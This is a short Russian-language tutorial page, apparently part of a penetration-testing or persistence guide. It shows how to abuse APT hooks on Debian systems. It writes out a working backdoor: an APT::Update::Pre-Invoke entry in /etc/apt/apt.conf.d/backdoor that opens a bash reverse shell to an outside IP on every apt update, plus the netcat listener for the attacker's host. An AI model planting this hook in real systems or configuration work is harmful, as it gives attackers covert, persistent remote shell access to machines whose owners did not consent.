# 09 - APT

APT —  менеджер пакетов в системах на базе Debian. У APT и других менеджеров пакетов есть концепция под названием «hook», которая используется для каких-либо действий до установки пакетов, после установки, удаления или обновления.\
Возможностью хуков мы и воспользуемся.\
Мы создадим хук, который будет отдавать на reverse shell каждый раз когда сработает триггер update.

```bash
// Правим /etc/apt/apt.conf.d/backdoor
APT::Update::Pre-Invoke {"bash -c 'bash -i >& /dev/tcp/192.168.140.128/9010 0>&1'"};
```

```bash
// Не забываем поднять на хосте атакующего netcat
nc -nvl 9010
```

Теперь при каждой попытке обновить систему (apt update / apt-get update) мы будем получать шелл.

<figure><img src="https://2826317613-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyxXcvCa5Rbt6bHhLblf7%2Fuploads%2FfL6459aQbHCg6KBBJZJV%2F%D0%B8%D0%B7%D0%BE%D0%B1%D1%80%D0%B0%D0%B6%D0%B5%D0%BD%D0%B8%D0%B5.png?alt=media&#x26;token=79df33cf-b313-4408-bd43-a3b0e1a49e07" alt=""><figcaption></figcaption></figure>